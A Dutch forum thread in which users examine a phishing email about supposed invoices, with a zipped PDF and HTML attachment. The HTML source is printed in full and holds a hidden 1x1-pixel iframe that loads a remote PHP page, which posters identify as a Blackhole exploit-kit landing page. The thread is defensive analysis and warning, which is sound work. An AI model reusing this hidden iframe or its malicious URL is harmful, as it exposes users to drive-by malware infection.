Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

Nieuwe NL phishing e-mail in omloop?

Pagina: 1
Acties:

  • Mr-Leo
  • Registratie: Oktober 2001
  • Laatst online: 07-04 22:56
Krijg zojuist een e-mail

Van: Daphne Herentals de Jong [D.Herentals@******.nl]
Geachte heer, mevrouw,

Ik krijg meerdere facturen binnen van uw bedrijf.
Ik kan me niet herinneren dat ik iets bij u heb afgenomen.
Zou u kunnen controleren of de factuur klopt die u mij stuurt?
Als de factuur klopt zal ik het verschuldigde bedrag overmaken.
Ik heb de facturen ingescant en als bijlage toegevoegd.
ik hoor het graag van u.

met vriendelijke groet,

Daphne Herentals de Jong
Met daarin een een zip bestand (facturen.zip) met twee bestanden.

Een PDF bestand (brotherx342scan01.pdf)
Afbeeldingslocatie: http://img51.imageshack.us/img51/9968/zuct.jpg

En een html bestand (brotherx342scan02.html)
HTML:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<html>
<head>
<title>Factuur</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<style>
body { font-size:18px; margin-top:15px; }
</style>
</head>
<body>
<center>Bezig met laden....</center>

<iframe src="http://gadgetrichrespectively.org/computed/rahcgnitubirtsidsuou.php" style="border:0px;width:1px;height:1px"></iframe>

</body>
</html>


Mijn gegevens zie ik nergens, ook mijn e-mailadres niet. Vooral het HTML bestand lijkt me verdacht. De pagina wil een java script laden. Google kent het domein niet eens. Verdacht??

  • MuddyMagical
  • Registratie: Januari 2001
  • Laatst online: 14:41
Euh ja!

Direct weggooien zulke mails. Ik ken geen bedrijven die met zulke domeinen werken. :+

  • MarchelHoek
  • Registratie: Juni 2007
  • Laatst online: 16:08
Gisteravond dezelfde mail ontvangen. Enkeltje Shift-Delete naar het grote archief.

Bla Bla Bla


  • hiekikowan
  • Registratie: Februari 2011
  • Laatst online: 24-11 16:03
Leuk dat ze hun algemene voorwaarden gedeponeerd hebben onder nummer '12345' bij de rechtbank te 'xxxxxxx'. Kortom, alleen dat is al een aanleiding om de mail onbeantwoord een enkeltje /dev/null te geven.

  • gambieter
  • Registratie: Oktober 2006
  • Niet online

gambieter

Just me & my cat

Hij is ook wel leuk: postcode 5681 is Best in Noord Brabant, niet Groningen.

Het is gewoon bedoeld om je aandacht te trekken, zodat je het niet gelijk weggooit. En dat heeft gewerkt :)

I had a decent lunch, and I'm feeling quite amiable. That's why you're still alive.


  • Mr-Leo
  • Registratie: Oktober 2001
  • Laatst online: 07-04 22:56
Er is wel veel werk van gemaakt!

Verwijderd

Website bestaat ook niet

  • Tukk
  • Registratie: Januari 2002
  • Laatst online: 28-11 13:23

Tukk

De α-man met het ẞ-brein

Ik vermoed dat de grap hem in de html zit:
• die iframe verwijst naar een vage site
• met een vage naam van de php-file: rahcgnitubirtsidsuou.php
• de iframe is 1 bij 1 pixel.

Oftwel, men hoopt dat je de html opent door de vreemde pdf en men hoopt dat de iframe daarna zijn werk kan gaan doen bij mensen die hun pc niet goed beveiligt hebben.

Zoals eerder gemeld, delete die rotzooi maar.

[ Voor 3% gewijzigd door Tukk op 03-10-2013 16:11 ]

Q: How many geeks does it take to ruin a joke? A: You mean nerd, not geek. And not joke, but riddle. Proceed.


  • Thralas
  • Registratie: December 2002
  • Laatst online: 15:20
En daar had je ook al geowned kunnen zijn. Pas op met het openen van files die je niet vertrouwt.

Verwijderd

Wie zegt dat hij niet geowned is dmv de PDF?

  • donnie1992
  • Registratie: Oktober 2008
  • Laatst online: 13:54
Omdat over het algemeen de pdf exploits (autoexec/driveby) redelijk gedicht zijn.

  • begintmeta
  • Registratie: November 2001
  • Niet online

begintmeta

Moderator General Chat
ZIjn er nog meta-gegevens beschikbaar (PDF&mail), dat zou wel interessant kunnen zijn?

  • Thralas
  • Registratie: December 2002
  • Laatst online: 15:20
begintmeta schreef op donderdag 03 oktober 2013 @ 21:29:
ZIjn er nog meta-gegevens beschikbaar (PDF&mail), dat zou wel interessant kunnen zijn?
Hier mailheaders.

Twee samples met verschillende filesize. Scans zijn vrij waardeloos though. Host uit het iframe serveerde eerder vandaag nog Blackhole.
Verwijderd schreef op donderdag 03 oktober 2013 @ 21:19:
Wie zegt dat hij niet geowned is dmv de PDF?
Niemand. Doch is het enigzins sullig om een 'nette' PDF-payload te vergezellen met een nogal obvious exploitkit in een iframe.

  • photofreak
  • Registratie: Augustus 2009
  • Laatst online: 23-11 08:31
Op de desbetreffende website was een instance van BlackHole gehost.
Meer informatie over de desbetreffende landing page kan gevonden worden op: http://urlquery.net/report.php?id=6276567

Overigens lijken/leken er meer malware instances op deze webserver te staan: https://www.virustotal.co...23.231.4.141/information/

Verwijderd

Thralas schreef op donderdag 03 oktober 2013 @ 21:41:
[...]

Niemand. Doch is het enigzins sullig om een 'nette' PDF-payload te vergezellen met een nogal obvious exploitkit in een iframe.
You never know. Besides, iemand die niet zeker weet of iets phishing is moet geen bijgevoegde attachments openen.
Twee samples met verschillende filesize. Scans zijn vrij waardeloos though. Host uit het iframe serveerde eerder vandaag nog Blackhole.
De PDFs in beide bestanden zijn identiek, en clean.

  • LnC
  • Registratie: Juni 2005
  • Laatst online: 03-08 11:16

LnC

The offending line...

Upload die twee bestanden eens naar Virustotal of een soort gelijke site. Misschien zit er in de .pdf bestand toch nog malware verborgen.
Pagina: 1